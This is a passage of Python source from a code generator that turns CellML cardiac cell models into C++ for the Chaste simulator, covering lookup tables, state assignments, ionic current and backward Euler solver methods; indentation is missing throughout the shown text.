self.writeln('UNSIGNED_UNSET, FREE', indent=False, nl=False)
elif output.get_type() == VarTypes.State:
self.writeln(self.state_vars.index(output), ', STATE', indent=False, nl=False)
elif output.is_derived_quantity:
self.writeln(self.derived_quantities.index(output), ', DERIVED', indent=False, nl=False)
elif output.is_modifiable_parameter:
self.writeln(self.cell_parameters.index(output), ', PARAMETER', indent=False, nl=False)
else:
raise ValueError('Unexpected protocol output: ' + str(output))
if outputs:
outputs.sort(key=lambda v: self.var_display_name(v))
self.output_comment('Protocol outputs')
self.writeln('this->mOutputsInfo.resize(', len(outputs), ');')
for i, output in enumerate(outputs):
self.writeln('this->mOutputsInfo[', i, ']', self.EQ_ASSIGN,
'std::make_pair(', nl=False)
write_output_info(output)
self.writeln(')', self.STMT_END, indent=False)
self.writeln()
outputs = set(outputs)
#1925 - outputs that are vectors
prop = ('pycml:output-vector', NSS['pycml'])
vector_names = set(cellml_metadata.get_targets(self.model, None,
cellml_metadata.create_rdf_node(prop)))
self.writeln('this->mVectorOutputsInfo.resize(', len(vector_names), ');')
self.writeln('this->mVectorOutputNames.resize(', len(vector_names), ');')
for i, name in enumerate(sorted(vector_names)):
self.writeln('this->mVectorOutputNames[', i, ']', self.EQ_ASSIGN, '"', name, '"', self.STMT_END)
vector_outputs = cellml_metadata.find_variables(self.model, prop, name)
assert len(vector_outputs) > 0
vector_outputs.sort(key=lambda v: self.var_display_name(v))
self.writeln('this->mVectorOutputsInfo[', i, '].resize(', len(vector_outputs), ');')
for j, output in enumerate(vector_outputs):
self.writeln('this->mVectorOutputsInfo[', i, '][', j, ']', self.EQ_ASSIGN,
'std::make_pair(', nl=False)
write_output_info(output)
self.writeln(')', self.STMT_END, indent=False)
self.writeln()
outputs.update(vector_outputs)
#1910 - SED-ML name mappings
prop = ('pycml:alias', NSS['pycml'])
aliased_vars = cellml_metadata.find_variables(self.model, prop, None)
prop = cellml_metadata.create_rdf_node(prop)
for var in aliased_vars:
assert var in outputs
source = cellml_metadata.create_rdf_node(fragment_id=var.cmeta_id)
for alias in cellml_metadata.get_targets(self.model, source, prop):
name = self.var_display_name(var)
self.writeln('this->mNameMap["', alias, '"] = "', name, '";')
#2178 - set up model outputs environment from above info
self.writeln()
self.writeln('ProcessOutputsInfo();')
self.writeln()
#2428 - also record protocol inputs
inputs = cellml_metadata.find_variables(self.model, ('pycml:input-variable', NSS['pycml']), 'yes')
if inputs:
inputs.sort(key=lambda v: self.var_display_name(v))
self.writeln('this->mInputNames.reserve(', len(inputs), ');')
for input in inputs:
self.writeln('this->mInputNames.push_back("', self.var_display_name(input), '");')
# Lookup table generation, if not in a singleton
if self.use_lookup_tables and not self.separate_lut_class:
self.output_lut_generation()
self.output_extra_constructor_content()
self.close_block()
return
def output_extra_constructor_content(self):
"""Hook for subclasses to add further content to the constructor."""
pass
def output_chaste_lut_methods(self):
"""
Output lookup table declarations & methods, if not using a separate class,
or output the method to get a pointer to the lookup table collection.
"""
if self.use_lookup_tables:
if self.separate_lut_class:
self.output_method_start('GetLookupTableCollection', [], 'AbstractLookupTableCollection*')
self.open_block()
self.writeln('return ', self.lt_class_name, '::Instance();')
self.close_block()
else:
self.send_main_output_to_subsidiary()
self.output_lut_declarations()
self.output_lut_row_lookup_memory()
self.output_lut_methods()
self.send_main_output_to_subsidiary(False)
def lut_parameters(self, key):
"""Get the bounds and step size for a particular table.
key should be a key into self.lookup_table_indices.
Returns (min, max, step) suitable for putting in generated code.
"""
if self.separate_lut_class:
idx = self.doc.lookup_table_indexes[key]
return map(lambda s: 'mTable%s[%s]' % (s, idx), ['Mins', 'Maxs', 'Steps', 'StepInverses'])
else:
return super(CellMLToChasteTranslator, self).lut_parameters(key)
def output_lut_indexing_methods(self):
"""Output methods in the LT class for indexing the tables, and checking index bounds.
These will be methods like
const double * const IndexTable0(double index_var);
if self.row_lookup_method, or like
void IndexTable0(double index_var, unsigned& index, double& factor);
otherwise, with
bool CheckIndex0(double& index_var);
for checking the bounds.
"""
for key, idx in self.doc.lookup_table_indexes.iteritems():
varname = self.code_name(key[-1])
method_name = 'IndexTable' + str(idx)
if self.row_lookup_method:
method = 'const double * %s(double %s)' % (method_name, varname)
else:
factor = self.lut_factor(idx)
idx_var = '_table_index_' + str(idx)
if factor:
factor = ', double& ' + factor
method = 'void %s(double %s, unsigned& %s%s)' % (method_name, varname, idx_var, factor)
self.writeln(method)
self.open_block()
self.output_table_index_generation_code(key, idx, call_method=False)
if self.row_lookup_method:
self.writeln('return _lt_', idx, '_row;')
self.close_block()
# And check the indexes
if self.config.options.check_lt_bounds:
self.writeln('#define COVERAGE_IGNORE', indent=False)
self.writeln('bool CheckIndex', idx, '(double& ', varname, ')')
self.open_block()
self.output_table_index_checking(key, idx, call_method=False)
self.writeln('return _oob_', idx, self.STMT_END)
self.close_block(blank_line=False)
self.writeln('#undef COVERAGE_IGNORE\n', indent=False)
def output_table_index_checking(self, key, idx, call_method=True):
"""Override base class method to call the methods on the lookup table class if needed."""
if self.separate_lut_class and call_method:
if self.config.options.check_lt_bounds:
var = key[-1]
varname = self.code_name(var)
self.writeln('const bool _oob_', idx, self.EQ_ASSIGN, self.lt_class_name,
'::Instance()->CheckIndex', idx, '(', varname, ')', self.STMT_END)
else:
super(CellMLToChasteTranslator, self).output_table_index_checking(key, idx)
def output_table_index_generation_code(self, key, idx, call_method=True):
"""Override base class method to call the methods on the lookup table class if needed."""
if self.separate_lut_class and call_method:
var = key[-1]
varname = self.code_name(var)
method_name = self.lt_class_name + '::Instance()->IndexTable' + str(idx)
if self.row_lookup_method:
self.writeln('const double* const _lt_', idx, '_row = ', method_name, '(', varname, ');')
else:
factor = self.lut_factor(idx, include_comma=True)
idx_var = '_table_index_' + str(idx)
self.writeln(method_name, '(', varname, ', ', idx_var, factor, ');')
else:
super(CellMLToChasteTranslator, self).output_table_index_generation_code(key, idx)
def output_lut_class(self):
"""Output a separate class for lookup tables.
This will live entirely in the .cpp file."""
# Lookup tables class
self.writeln('class ', self.lt_class_name, ' : public AbstractLookupTableCollection')
self.writeln('{')
self.writeln('public:')
self.set_indent(1)
# Method to get the table instance object
self.writeln('static ', self.lt_class_name, '* Instance()')
self.open_block()
self.writeln('if (mpInstance.get() == NULL)')
self.writeln('{')
self.writeln('mpInstance.reset(new ', self.lt_class_name, ');', indent_offset=1)
self.writeln('}')
self.writeln('return mpInstance.get();')
self.close_block()
# Method to free the table memory
self.writeln('void FreeMemory()')
self.open_block()
self.output_lut_deletion()
self.writeln('mNeedsRegeneration.assign(mNeedsRegeneration.size(), true);')
self.close_block()
# Table lookup methods
self.output_lut_methods()
self.output_lut_indexing_methods()
# Destructor
self.writeln('~', self.lt_class_name, '()')
self.open_block()
self.output_lut_deletion()
self.close_block()
# Make the class a singleton
self.writeln('protected:', indent_level=0)
self.writeln(self.lt_class_name, '(const ', self.lt_class_name, '&);')
self.writeln(self.lt_class_name, '& operator= (const ', self.lt_class_name, '&);')
# Constructor
self.writeln(self.lt_class_name, '()')
self.open_block()
self.writeln('assert(mpInstance.get() == NULL);')
if self.config.options.include_dt_in_tables:
self.writeln('mDt = HeartConfig::Instance()->GetOdeTimeStep();')
self.writeln('assert(mDt > 0.0);')
num_indexes = len(self.doc.lookup_table_indexes)
self.writeln('mKeyingVariableNames.resize(', num_indexes, ');')
self.writeln('mNumberOfTables.resize(', num_indexes, ');')
self.writeln('mTableMins.resize(', num_indexes, ');')
self.writeln('mTableSteps.resize(', num_indexes, ');')
self.writeln('mTableStepInverses.resize(', num_indexes, ');')
self.writeln('mTableMaxs.resize(', num_indexes, ');')
self.writeln('mNeedsRegeneration.resize(', num_indexes, ');')
for key, idx in self.doc.lookup_table_indexes.iteritems():
min, max, step, var = key
num_tables = unicode(self.doc.lookup_tables_num_per_index[idx])
self.writeln('mKeyingVariableNames[', idx, '] = "', self.var_display_name(var), '";')
self.writeln('mNumberOfTables[', idx, '] = ', num_tables, self.STMT_END)
self.writeln('mTableMins[', idx, '] = ', min, self.STMT_END)
self.writeln('mTableSteps[', idx, '] = ', step, self.STMT_END)
self.writeln('mTableStepInverses[', idx, '] = ', str(1/float(step)), self.STMT_END)
self.writeln('mTableMaxs[', idx, '] = ', max, self.STMT_END)
self.writeln('mNeedsRegeneration[', idx, '] = true;')
self.writeln('_lookup_table_', idx, self.EQ_ASSIGN, 'NULL', self.STMT_END)
self.writeln(self.lt_class_name, '::RegenerateTables();')
self.close_block()
# Table (re-)generation
self.writeln('void RegenerateTables()')
self.open_block()
event_handler = 'AbstractLookupTableCollection::EventHandler::'
self.writeln(event_handler, 'BeginEvent(', event_handler, 'GENERATE_TABLES);')
if self.config.options.include_dt_in_tables:
self.writeln(self.TYPE_CONST_DOUBLE, self.code_name(self.config.dt_variable), ' = mDt;')
# Hack: avoid unused variable warning
self.writeln('double _unused = ', self.code_name(self.config.dt_variable), ';')
self.writeln('_unused = _unused;\n')
for idx in self.doc.lookup_table_indexes.itervalues():
self.writeln('if (mNeedsRegeneration[', idx, '])')
self.open_block()
self.output_lut_deletion(only_index=idx)
self.output_lut_generation(only_index=idx)
self.writeln('mNeedsRegeneration[', idx, '] = false;')
self.close_block(blank_line=True)
self.writeln(event_handler, 'EndEvent(', event_handler, 'GENERATE_TABLES);')
self.close_block()
# Private data
self.writeln('private:', indent_level=0)
self.writeln('/** The single instance of the class */')
self.writeln('static std::auto_ptr<', self.lt_class_name, '> mpInstance;\n')
if self.row_lookup_method:
self.output_lut_row_lookup_memory()
self.output_lut_declarations()
# Close the class
self.set_indent(0)
self.writeln('};\n')
# Define the instance pointer
self.writeln('std::auto_ptr<', self.lt_class_name, '> ', self.lt_class_name, '::mpInstance;')
self.writeln()
return
def output_state_assignments(self, exclude_nonlinear=False,
assign_rY=True,
nodeset=None,
pointer=''):
"""Output statements extracting state variables from their vector.
If exclude_nonlinear is set to true, state variables appearing
in the nonlinear system will not be included.
If nodeset is given, only state variables appearing in nodeset
will be included.
If pointer is given, then the state variables actually appear in the
variable given by pointer, which is of type const std::vector<double>*.
"""
used_vars = set()
for var in self.state_vars:
if ((not exclude_nonlinear or var not in self.nonlinear_system_vars)
and (nodeset is None or var in nodeset)):
used_vars.add(var)
if assign_rY and used_vars:
if pointer:
self.output_comment('For state variable interpolation (SVI) we read in interpolated state variables,')
self.output_comment('otherwise for ionic current interpolation (ICI) we use the state variables of this model (node).')
if self.TYPE_VECTOR_REF == CellMLToChasteTranslator.TYPE_VECTOR_REF:
self.writeln('if (!%s) %s = &rGetStateVariables();' % (pointer, pointer))
self.writeln('const ', self.TYPE_VECTOR_REF, 'rY = *', pointer, self.STMT_END)
else:
self.writeln(self.TYPE_VECTOR_REF, 'rY;')
self.writeln('bool made_new_cvode_vector = false;')
self.writeln('if (!%s)' % (pointer))
self.open_block()
self.writeln('rY = rGetStateVariables();')
self.close_block(False)
self.writeln('else')
self.open_block()
self.writeln('made_new_cvode_vector = true;')
self.writeln('rY = MakeNVector(*%s);' % (pointer))
self.close_block()
else:
self.writeln(self.TYPE_VECTOR_REF, 'rY = rGetStateVariables();')
if self.options.protocol:
low_prop = ('pycml:range-low', NSS['pycml'])
high_prop = ('pycml:range-high', NSS['pycml'])
def check_bound(prop, reln, var, value):
prop_value = var.get_rdf_annotation(prop)
if prop_value:
value = '(%s %s %s ? %s : %s)' % (value, reln, prop_value, prop_value, value)
return value
for i, var in enumerate(self.state_vars):
if var in used_vars:
if self.use_modifiers and var in self.modifier_vars:
value = self.modifier_call(var, self.vector_index('rY', i))
else:
value = self.vector_index('rY', i)
if self.options.protocol:
value = check_bound(low_prop, '<', var, value)
value = check_bound(high_prop, '>', var, value)
#2116 - use supplied fixed voltage if we're clamping
if var is self.v_variable:
value = '(mSetVoltageDerivativeToZero ? this->mFixedVoltage : %s)' % value
self.writeln(self.TYPE_DOUBLE, self.code_name(var),
self.EQ_ASSIGN, value, self.STMT_END)
self.writeln(self.COMMENT_START, 'Units: ', var.units,
'; Initial value: ',
getattr(var, u'initial_value', 'Unknown'))
#621 TODO: maybe convert if state var dimensions include time
self.writeln()
return
def modifier_call(self, var, current_value):
"""Return code for a call to a modifier function for an oxmeta-annotated variable.
The modifier function takes 2 parameters: the current value of the variable,
and the current time. It returns a modified value for the variable.
"""
return ('mp_' + var.oxmeta_name + '_modifier->Calc(' +
current_value + ', ' + self.code_name(self.free_vars[0]) + ')')
def vector_index(self, vector, i):
"""Return code for accessing the i'th index of vector."""
return vector + '[' + str(i) + ']'
def vector_create(self, vector, size):
"""Return code for creating a new vector with the given size."""
return ''.join(map(str, [self.TYPE_VECTOR, vector, '(', size, ')', self.STMT_END]))
def vector_initialise(self, vector, size):
"""Return code for creating an already-declared vector with the given size."""
return ''.join(map(str, [vector, '.resize(', size, ')', self.STMT_END]))
def output_nonlinear_state_assignments(self, nodeset=None):
"""Output assignments for nonlinear state variables."""
for i, var in enumerate(self.nonlinear_system_vars):
if not nodeset or var in nodeset:
self.writeln(self.TYPE_DOUBLE, self.code_name(var), self.EQ_ASSIGN,
self.vector_index('rCurrentGuess', i), self.STMT_END)
#621 TODO: maybe convert if state var dimensions include time
self.writeln()
return
def get_stimulus_assignment(self):
"""Return code for getting Chaste's stimulus current."""
expr = self.doc._cml_config.i_stim_var
output = self.code_name(expr) + self.EQ_ASSIGN
get_stim = 'GetIntracellularAreaStimulus(' + self.code_name(self.free_vars[0]) + ')'
if self.doc._cml_config.i_stim_negated:
get_stim = '-' + get_stim
return output + get_stim + self.STMT_END
def output_equations(self, nodeset, zero_stimulus=False):
"""Output the mathematics described by nodeset.
nodeset represents a subset of the assignments in the model.
Output assignments in the order given by a topological sort,
but only include those in nodeset.
"""
# Special case for the stimulus current
if self.doc._cml_config.i_stim_var in nodeset:
if zero_stimulus:
i_stim = self.doc._cml_config.i_stim_var
stim_assignment = self.code_name(i_stim) + self.EQ_ASSIGN + '0.0' + self.STMT_END
else:
stim_assignment = self.get_stimulus_assignment()
for expr in (e for e in self.model.get_assignments() if e in nodeset):
# Special-case the stimulus current
if self.use_chaste_stimulus or zero_stimulus:
if isinstance(expr, cellml_variable) and expr is self.doc._cml_config.i_stim_var:
self.writeln(self.TYPE_CONST_DOUBLE, stim_assignment)
elif not (isinstance(expr, mathml_apply) and
isinstance(expr.operator(), mathml_eq) and
isinstance(expr.eq.lhs, mathml_ci) and
expr.eq.lhs.variable is self.doc._cml_config.i_stim_var):
self.output_assignment(expr)
else:
self.output_assignment(expr)
return
def output_assignment(self, expr):
"""Output an assignment statement.
Has overrides for various special cases.
"""
clear_type = False
writing_data_clamp_current = False
# Figure out what is being assigned to
if isinstance(expr, cellml_variable):
assigned_var = expr
else:
if expr.eq.lhs.localName == 'ci':
assigned_var = expr.eq.lhs.variable
if assigned_var is self.config.i_data_clamp_current:
writing_data_clamp_current = True
self.output_comment('Special handling of data clamp current here (see #2708)')
self.output_comment('(we want to save expense of calling the interpolation method if possible.)')
self.writeln(self.TYPE_DOUBLE, self.code_name(assigned_var), self.EQ_ASSIGN, '0.0' , self.STMT_END)
self.writeln('if (mDataClampIsOn)')
self.open_block()
clear_type = True
else:
assigned_var = None # We don't store derivatives as members
#907: Check if this is the derivative of the transmembrane potential
if not self.use_backward_euler and expr.eq.lhs.diff.dependent_variable == self.v_variable:
clear_type = True
# Parameters don't need assigning
has_modifier = self.use_modifiers and getattr(assigned_var, '_cml_has_modifier', False)
if assigned_var in self.cell_parameters and not has_modifier:
return
# Is the variable declared elsewhere?
if clear_type:
self.TYPE_DOUBLE = self.TYPE_CONST_DOUBLE = ''
elif getattr(assigned_var, '_cml_modifiable', False):
# Override const-ness, e.g. for a lookup table index
self.TYPE_CONST_DOUBLE = self.TYPE_DOUBLE
if (assigned_var and self.use_modifiers and assigned_var in self.modifier_vars
and assigned_var.get_type() != VarTypes.State):
# "Constant" oxmeta-annotated parameters may be modified at run-time
if has_modifier:
# Turn off the modifier to figure out the base value
assigned_var._cml_has_modifier = False
rhs = self.code_name(assigned_var)
assigned_var._cml_has_modifier = True
else:
self.capture_output()
super(CellMLToChasteTranslator, self).output_assignment(expr)
assignment = self.get_captured_output()
eq_pos = assignment.find(self.EQ_ASSIGN)
end_pos = assignment.find(self.STMT_END)
rhs = assignment[eq_pos+len(self.EQ_ASSIGN):end_pos]
if rhs:
# If assigned_var is computed, it'll 'appear' twice - once with expr==assigned_var,
# and once for the assignment mathml_apply. The former will result in an empty rhs.
self.writeln(self.TYPE_CONST_DOUBLE, self.code_name(assigned_var), self.EQ_ASSIGN,
self.modifier_call(assigned_var, rhs), self.STMT_END, nl=False)
self.output_comment(assigned_var.units, indent=False, pad=True)
else:
super(CellMLToChasteTranslator, self).output_assignment(expr)
# if assigned_var:
# # Debug
# self.writeln('EXCEPT_IF_NOT(!std::isinf(', self.code_name(assigned_var), '));')
# self.writeln('EXCEPT_IF_NOT(!std::isnan(', self.code_name(assigned_var), '));')
if clear_type:
# Remove the instance attributes, thus reverting to the class members
del self.TYPE_DOUBLE
del self.TYPE_CONST_DOUBLE
elif getattr(assigned_var, '_cml_modifiable', False):
del self.TYPE_CONST_DOUBLE
if writing_data_clamp_current:
self.close_block(False)
return
def output_mathematics(self):
"""Output the mathematics in this model.
When backward Euler is used, we do so in 5 methods:
* UpdateTransmembranePotential does a forward Euler step for V
* ComputeOneStepExceptVoltage co-ordinates a backward Euler step
* ComputeResidual and ComputeJacobian are used in the Newton iteration
* GetIIonic returns the total ionic current
Rush-Larsen is implemented similarly, with:
* EvaluateEquations evaluate the model derivatives and alpha/beta terms
* ComputeOneStepExceptVoltage does a Rush-Larsen update for eligible variables,
and a forward Euler step for other non-V state variables
Generalised Rush-Larsen methods also have specialised handling; see the
individual methods for details.
For other solvers, only 2 methods are needed:
* EvaluateYDerivatives computes the RHS of the ODE system
* GetIIonic is as above
Where derived-quantity annotations are present, we also generate a
ComputeDerivedQuantities method.
"""
self.output_get_i_ionic()
if self.options.rush_larsen:
self.output_rush_larsen_mathematics()
elif self.use_backward_euler:
self.output_backward_euler_mathematics()
elif self.options.grl1:
self.output_grl1_mathematics()
elif self.options.grl2:
self.output_grl2_mathematics()
else:
self.output_evaluate_y_derivatives()
self.output_derived_quantities()
def calculate_lookup_table_indices(self, nodeset, time_name=None):
"""Output the lookup table index calculations needed for the given equations, if tables are enabled.
If time_name is given, it may be used in exception messages for tables out of bounds.
Note that it is needed to be passed in, since GetIIonic does not know the time.
Returns the subset of nodeset used in calculating the indices.
"""
if self.use_lookup_tables:
nodes_used = self.output_table_index_generation(time_name, nodeset=nodeset)
else:
nodes_used = set()
return nodes_used
def output_get_i_ionic(self):
"""Output the GetIIonic method."""
use_modifiers = self.use_modifiers
self.use_modifiers = False
self.output_method_start('GetIIonic', ['const std::vector<double>* pStateVariables'],
self.TYPE_DOUBLE, access='public', defaults=['NULL'])
self.open_block()
# Output mathematics to calculate ionic current, using solver_info.ionic_current.
if (hasattr(self.model, u'solver_info') and hasattr(self.model.solver_info, u'ionic_current')):
if not hasattr(self.model.solver_info.ionic_current, u'var'):
raise ValueError('No ionic currents found; check your configuration file')
nodes = map(lambda elt: self.varobj(unicode(elt)),
self.model.solver_info.ionic_current.var)
# GetIIonic must not include the stimulus current
i_stim = self.doc._cml_config.i_stim_var
nodeset = self.calculate_extended_dependencies(nodes, prune_deps=[i_stim])
#print map(lambda v: v.fullname(), nodes)
#print filter(lambda p: p[2]>0, map(debugexpr, nodeset))
# Output main part of maths
self.output_state_assignments(nodeset=nodeset, pointer='pStateVariables')
table_index_nodes_used = self.calculate_lookup_table_indices(nodeset)
self.output_equations(nodeset - table_index_nodes_used, zero_stimulus=True)
self.writeln()
# Assign the total current to a temporary so we can check for NaN
self.writeln(self.TYPE_CONST_DOUBLE, 'i_ionic', self.EQ_ASSIGN, nl=False)
if self.doc._cml_config.i_ionic_negated:
self.writeln('-(', nl=False, indent=False)
plus = False
for varelt in self.model.solver_info.ionic_current.var:
if plus: self.write('+')
else: plus = True
self.output_variable(varelt)
if self.doc._cml_config.i_ionic_negated:
self.writeln(')', nl=False, indent=False)
self.writeln(self.STMT_END, indent=False)
if self.TYPE_VECTOR_REF == CellMLToCvodeTranslator.TYPE_VECTOR_REF:
self.writeln('if (made_new_cvode_vector)')
self.open_block()
self.writeln('DeleteVector(rY);')
self.close_block(False)
self.writeln('EXCEPT_IF_NOT(!std::isnan(i_ionic));')
self.writeln('return i_ionic', self.STMT_END)
else:
self.writeln('return 0.0;')
self.close_block()
self.use_modifiers = use_modifiers
def output_evaluate_y_derivatives(self, method_name='EvaluateYDerivatives'):
"""Output the EvaluateYDerivatives method."""
# Start code output
self.output_method_start(method_name,
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0]),
'const ' + self.TYPE_VECTOR_REF + 'rY',
self.TYPE_VECTOR_REF + 'rDY'],
'void', access='public')
self.open_block()
if not self.state_vars:
# This isn't an ODE model!
self.close_block()
return
self.output_comment('Inputs:')
self.output_comment('Time units: ', self.free_vars[0].units)
self.output_derivative_calculations(self.state_vars)
# Assign to derivatives vector
for i, var in enumerate(self.state_vars):
self.writeln(self.vector_index('rDY', i), self.EQ_ASSIGN, self.code_name(var, True), self.STMT_END)
self.close_block()
def output_derivative_calculations(self, state_vars, assign_rY=False, extra_nodes=set(),
extra_table_nodes=set()):
"""
This is used by self.output_evaluate_y_derivatives and self.output_rush_larsen_mathematics
to compute the derivatives (and any extra nodes, if given). It contains the special logic
to obey the mSetVoltageDerivativeToZero member variable in the generated code.
Returns a nodeset containing the equations output.
"""
# Work out what equations are needed to compute the derivatives
derivs = set(map(lambda v: (v, self.free_vars[0]), state_vars))
if self.v_variable in state_vars:
dvdt = (self.v_variable, self.free_vars[0])
derivs.remove(dvdt) #907: Consider dV/dt separately
else:
dvdt = None
if self.use_chaste_stimulus:
i_stim = [self.doc._cml_config.i_stim_var]
else:
i_stim = []
nonv_nodeset = self.calculate_extended_dependencies(derivs|extra_nodes, prune_deps=i_stim)
if dvdt:
if self.use_data_clamp:
prune = set([self.config.i_data_clamp_data]) | nonv_nodeset
else:
prune = nonv_nodeset
v_nodeset = self.calculate_extended_dependencies([dvdt], prune=prune, prune_deps=i_stim)
else:
v_nodeset = set()
# State variable inputs
all_nodes = nonv_nodeset|v_nodeset
self.output_state_assignments(assign_rY=assign_rY, nodeset=all_nodes)
self.writeln()
table_index_nodes_used = self.calculate_lookup_table_indices(all_nodes|extra_table_nodes, self.code_name(self.free_vars[0]))
self.output_comment('Mathematics')
#907: Declare dV/dt
if dvdt:
self.writeln(self.TYPE_DOUBLE, self.code_name(self.v_variable, ode=True), self.STMT_END)
# Output mathematics required for non-dV/dt derivatives (which may include dV/dt)
self.output_equations(nonv_nodeset - table_index_nodes_used)
self.writeln()
#907: Calculation of dV/dt
if dvdt:
self.writeln('if (mSetVoltageDerivativeToZero)')
self.open_block()
self.writeln(self.code_name(self.v_variable, ode=True), self.EQ_ASSIGN, '0.0', self.STMT_END)
self.close_block(blank_line=False)
self.writeln('else')
self.open_block()
self.output_equations(v_nodeset - table_index_nodes_used)
self.close_block()
return all_nodes | table_index_nodes_used
def output_backward_euler_mathematics(self):
"""Output the mathematics methods used in a backward Euler cell.
Outputs ComputeResidual, ComputeJacobian,
UpdateTransmembranePotential and ComputeOneStepExceptVoltage.
"""
dt_name = 'mDt'
#model_dt = self.varobj(self.model.solver_info.dt)
if self.nonlinear_system_size > 0:
# Residual
##########
argsize = '[' + str(self.nonlinear_system_size) + ']'
self.output_method_start('ComputeResidual',
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0]),
self.TYPE_CONST_DOUBLE + 'rCurrentGuess' + argsize,
self.TYPE_DOUBLE + 'rResidual' + argsize],
'void', access='public')
self.open_block()
# Output mathematics for computing du/dt for each nonlinear state var u
nodes = map(lambda u: (u, self.free_vars[0]), self.nonlinear_system_vars)
nodeset = self.calculate_extended_dependencies(nodes, prune_deps=[self.doc._cml_config.i_stim_var])
self.output_state_assignments(exclude_nonlinear=True, nodeset=nodeset)
self.output_nonlinear_state_assignments(nodeset=nodeset)
table_index_nodes_used = self.calculate_lookup_table_indices(nodeset, self.code_name(self.free_vars[0]))
self.output_equations(nodeset - table_index_nodes_used)
self.writeln()
# Fill in residual
for i, var in enumerate(self.state_vars):
try:
j = self.nonlinear_system_vars.index(var)
except ValueError:
j = -1
if j != -1:
self.writeln('rResidual[', j, '] = rCurrentGuess[', j, '] - rY[', i, '] - ',
dt_name, '*', self.code_name(var, ode=True), self.STMT_END)
self.close_block()
# Jacobian
##########
self.output_method_start('ComputeJacobian',
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0]),
self.TYPE_CONST_DOUBLE + 'rCurrentGuess' + argsize,
self.TYPE_DOUBLE + 'rJacobian' + argsize + argsize],
'void', access='public')
self.open_block()
# Mathematics that the Jacobian depends on
used_vars = set()
for entry in self.model.solver_info.jacobian.entry:
used_vars.update(self._vars_in(entry.math))
nodeset = self.calculate_extended_dependencies(used_vars, prune_deps=[self.doc._cml_config.i_stim_var])
self.output_state_assignments(exclude_nonlinear=True, nodeset=nodeset)
self.output_nonlinear_state_assignments(nodeset=nodeset)
self.writeln(self.TYPE_CONST_DOUBLE, self.code_name(self.config.dt_variable), self.EQ_ASSIGN, dt_name, self.STMT_END, '\n')
table_index_nodes_used = self.calculate_lookup_table_indices(nodeset|set(map(lambda e: e.math, self.model.solver_info.jacobian.entry)), self.code_name(self.free_vars[0]))
self.output_equations(nodeset - table_index_nodes_used)
self.writeln()
# Jacobian entries
for entry in self.model.solver_info.jacobian.entry:
var_i, var_j = entry.var_i, entry.var_j
i = self.nonlinear_system_vars.index(self.varobj(var_i))
j = self.nonlinear_system_vars.index(self.varobj(var_j))
self.writeln('rJacobian[', i, '][', j, '] = ', nl=False)
entry_content = list(entry.math.xml_element_children())
assert len(entry_content) == 1, "Malformed Jacobian matrix entry: " + entry.xml()
self.output_expr(entry_content[0], False)
self.writeln(self.STMT_END, indent=False)
# self.output_comment('Debugging')
# self.writeln('#ifndef NDEBUG', indent=False)
# self.writeln('for (unsigned i=0; i<', len(self.nonlinear_system_vars), '; i++)')
# self.writeln('for (unsigned j=0; j<', len(self.nonlinear_system_vars), '; j++)', indent_offset=1)
# self.writeln('EXCEPT_IF_NOT(!std::isnan(rJacobian[i][j]));', indent_offset=2)
# self.writeln('//DumpJacobianToFile(', self.code_name(self.free_vars[0]),
# ', rCurrentGuess, rJacobian, rY);')
# self.writeln('#endif // NDEBUG', indent=False)
self.close_block()
# The other methods are protected
self.writeln_hpp('protected:', indent_offset=-1)
# UpdateTransmembranePotential
##############################
self.output_method_start('UpdateTransmembranePotential',
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0])],
'void', access='public')
self.open_block()
self.output_comment('Time units: ', self.free_vars[0].units)
# Output mathematics to compute dV/dt
nodes = [(self.state_vars[self.v_index], self.free_vars[0])]
nodeset = self.calculate_extended_dependencies(nodes, prune_deps=[self.doc._cml_config.i_stim_var])
self.output_state_assignments(nodeset=nodeset)
table_index_nodes_used = self.calculate_lookup_table_indices(nodeset, self.code_name(self.free_vars[0]))
self.output_equations(nodeset - table_index_nodes_used)
# Update V
self.writeln()
self.writeln('rY[', self.v_index, '] += ', dt_name, '*',
self.code_name(self.state_vars[self.v_index], ode=True), self.STMT_END)
self.close_block()
# ComputeOneStepExceptVoltage
#############################
self.output_method_start('ComputeOneStepExceptVoltage',
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0])],
'void', access='public')
self.open_block()
self.writeln(self.COMMENT_START, 'Time units: ',
self.free_vars[0].units)
# Output mathematics to update linear state variables, using solver_info.linear_odes.
# Also need to use output_equations for variables used in the update equations.
linear_vars, update_eqns = [], {}
used_vars = set() # NB: Also contains update equation if is a mathml_apply so table index generation works
for u, t, update_eqn in SolverInfo(self.model).get_linearised_odes():
assert t == self.free_vars[0]
assert len(update_eqn) == 1
update_eqn = update_eqn[0]
linear_vars.append(u)
update_eqns[id(u)] = update_eqn
if not isinstance(update_eqn, mathml_cn): used_vars.add(update_eqn)
used_vars.update(self._vars_in(update_eqn))
# Output required equations for used variables
nodeset = self.calculate_extended_dependencies(used_vars, prune_deps=[self.doc._cml_config.i_stim_var])
self.output_state_assignments(nodeset=nodeset)
if self.config.dt_variable in nodeset:
self.writeln(self.TYPE_CONST_DOUBLE, self.code_name(self.config.dt_variable), self.EQ_ASSIGN,
dt_name, self.STMT_END, '\n')
table_index_nodes_used = self.calculate_lookup_table_indices(nodeset, self.code_name(self.free_vars[0]))
self.output_equations(nodeset - table_index_nodes_used)
# Update state variables:
# rY[i] = (rY[i] + _g_j*dt) / (1 - _h_j*dt)
self.writeln()
linear_vars.sort(key=lambda v: v.fullname())
for i, u in enumerate(linear_vars):
j = self.state_vars.index(u)
self.writeln('rY[', j, ']', self.EQ_ASSIGN, nl=False)
self.output_expr(update_eqns[id(u)], False)
self.writeln(self.STMT_END, indent=False)
# Set up the Newton iteration, if needed
self.writeln()
if self.nonlinear_system_size > 0:
self.writeln('double _guess[', self.nonlinear_system_size, '] = {', nl=False)
comma = False
idx_map = [0] * self.nonlinear_system_size
for i, var in enumerate(self.state_vars):
try:
j = self.nonlinear_system_vars.index(var)
idx_map[j] = i
except ValueError:
pass
for i in idx_map:
if comma: self.write(',')
else: comma = True
self.write('rY[', i, ']')
self.writeln('};', indent=False)
# Solve
CNS = 'CardiacNewtonSolver<%d,%s>' % (self.nonlinear_system_size, self.class_name)
self.writeln(CNS, '* _p_solver = ', CNS, '::Instance();')
self.writeln('_p_solver->Solve(*this, ', self.code_name(self.free_vars[0]), ', _guess);')
# Update state
for j, i in enumerate(idx_map):
self.writeln('rY[', i, '] = _guess[', j, '];')
self.close_block()
def output_rush_larsen_mathematics(self):
